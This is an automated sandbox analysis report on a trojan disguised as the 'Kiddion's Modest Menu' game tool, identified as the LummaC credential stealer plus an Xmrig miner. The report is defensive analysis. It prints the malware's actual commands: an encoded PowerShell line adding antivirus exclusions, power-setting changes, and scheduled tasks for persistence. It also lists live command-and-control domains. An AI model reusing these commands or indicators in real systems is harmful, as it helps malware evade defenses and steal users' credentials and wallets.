Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Kiddion's Modest Menu v.1.0.0.exe

Overview

General Information

Sample name:Kiddion's Modest Menu v.1.0.0.exe
Analysis ID:1636791
MD5:65605c7d9ca4721aff5da72539b00729
SHA1:9a566027023ba2d3dc5100a823812f7f87b99059
SHA256:59f38b0c6535a71432a891ff97dd309d19e5ed3c068b3fed91045d1293a72c29
Tags:exeLummaStealeruser-tcains1
Infos:

Detection

LummaC Stealer, Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Kiddion's Modest Menu v.1.0.0.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe" MD5: 65605C7D9CA4721AFF5DA72539B00729)
    • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Kiddion's Modest Menu v.1.0.0.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe" MD5: 65605C7D9CA4721AFF5DA72539B00729)
      • 1C2NX3IUVJPXMLDGP.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe" MD5: C11A82D699A06D9B8BA4296E0C562AE4)
        • cmd.exe (PID: 7444 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8104 cmdline: powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 8128 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powercfg.exe (PID: 4812 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • powercfg.exe (PID: 2800 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • powercfg.exe (PID: 1464 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • powercfg.exe (PID: 1204 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • powercfg.exe (PID: 2132 cmdline: powercfg /hibernate off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
        • cmd.exe (PID: 2976 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 1732 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 3868 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5846" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7328 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5846" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
    • WerFault.exe (PID: 7784 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 404 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "fed6e09d7cce440c06ce97b0ad4a5156875b61f002ac55e51abf"}
SourceRuleDescriptionAuthorStrings
00000002.00000003.1274915003.00000000015D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.1489565252.0000000002AFE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        00000002.00000003.1306812533.00000000015D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.2391926634.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            2.2.Kiddion's Modest Menu v.1.0.0.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              2.2.Kiddion's Modest Menu v.1.0.0.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                14.2.1C2NX3IUVJPXMLDGP.exe.2ab8321.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

                  System Summary

                  barindex
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe, ProcessId: 7724, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe", ParentImage: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe, ParentProcessId: 7724, ParentProcessName: 1C2NX3IUVJPXMLDGP.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 7444, ProcessName: cmd.exe
                  Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" , ProcessId: 8104, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" , ProcessId: 8104, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe", ParentImage: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe, ParentProcessId: 7724, ParentProcessName: 1C2NX3IUVJPXMLDGP.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 2976, ProcessName: cmd.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T05:46:11.357439+010020283713Unknown Traffic192.168.2.449714188.114.96.3443TCP
                  2025-03-13T05:46:14.611458+010020283713Unknown Traffic192.168.2.449716188.114.96.3443TCP
                  2025-03-13T05:46:18.373236+010020283713Unknown Traffic192.168.2.449721188.114.96.3443TCP
                  2025-03-13T05:46:21.619205+010020283713Unknown Traffic192.168.2.449726188.114.96.3443TCP
                  2025-03-13T05:46:25.587429+010020283713Unknown Traffic192.168.2.449728188.114.96.3443TCP
                  2025-03-13T05:46:29.245546+010020283713Unknown Traffic192.168.2.449732188.114.96.3443TCP
                  2025-03-13T05:46:33.068506+010020283713Unknown Traffic192.168.2.449733188.114.96.3443TCP
                  2025-03-13T05:46:35.271903+010020283713Unknown Traffic192.168.2.449734104.21.64.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T05:46:43.825761+010028290562Crypto Currency Mining Activity Detected192.168.2.449737185.215.113.5180TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Kiddion's Modest Menu v.1.0.0.exeAvira: detected
                  Source: https://featureccus.shop/Avira URL Cloud: Label: malware
                  Source: citydisco.bet/gdJISAvira URL Cloud: Label: malware
                  Source: https://featureccus.shop/bdMAnAvira URL Cloud: Label: malware
                  Source: https://mrodularmall.top/qAvira URL Cloud: Label: malware
                  Source: https://mrodularmall.top/aNzS_Avira URL Cloud: Label: malware
                  Source: https://mrodularmall.top/aNzS-.nAvira URL Cloud: Label: malware
                  Source: https://mrodularmall.top/Avira URL Cloud: Label: malware
                  Source: https://mrodularmall.top/aNzSAvira URL Cloud: Label: malware
                  Source: https://citydisco.bet/gdJISAvira URL Cloud: Label: malware
                  Source: https://citydisco.bet/gdJIS;Avira URL Cloud: Label: malware
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "fed6e09d7cce440c06ce97b0ad4a5156875b61f002ac55e51abf"}
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeReversingLabs: Detection: 81%
                  Source: Kiddion's Modest Menu v.1.0.0.exeVirustotal: Detection: 69%Perma Link
                  Source: Kiddion's Modest Menu v.1.0.0.exeReversingLabs: Detection: 65%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpString decryptor: citydisco.bet/gdJIS
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpString decryptor: featureccus.shop/bdMAn
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpString decryptor: mrodularmall.top/aNzS
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpString decryptor: jowinjoinery.icu/bdWUa
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpString decryptor: legenassedk.top/bdpWO
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpString decryptor: htardwarehu.icu/Sbdsa
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpString decryptor: cjlaspcorne.icu/DbIps
                  Source: 00000000.00000002.1223310292.000000000291D000.00000004.00000020.00020000.00000000.sdmpString decryptor: bugildbett.top/bAuz
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_0041BBA0 CryptUnprotectData,2_2_0041BBA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_0041FC98 CryptUnprotectData,2_2_0041FC98
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_004207A3 CryptUnprotectData,2_2_004207A3

                  Bitcoin Miner

                  barindex
                  Source: Yara matchFile source: 14.2.1C2NX3IUVJPXMLDGP.exe.2ab8321.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1489565252.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Kiddion's Modest Menu v.1.0.0.exe PID: 7696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 1C2NX3IUVJPXMLDGP.exe PID: 7724, type: MEMORYSTR
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49736 version: TLS 1.2
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016824681.0000000001665000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017495532.0000000001604000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmp, 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000000.1416561359.0000000000662000.00000002.00000001.01000000.00000008.sdmp, 1C2NX3IUVJPXMLDGP.exe.2.dr
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.14.dr
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A3FCDE FindFirstFileExW,0_2_00A3FCDE
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A3FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00A3FD8F
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A3FCDE FindFirstFileExW,2_2_00A3FCDE
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A3FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00A3FD8F
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 4x nop then lea eax, dword ptr [esp+48h]2_2_0041108E
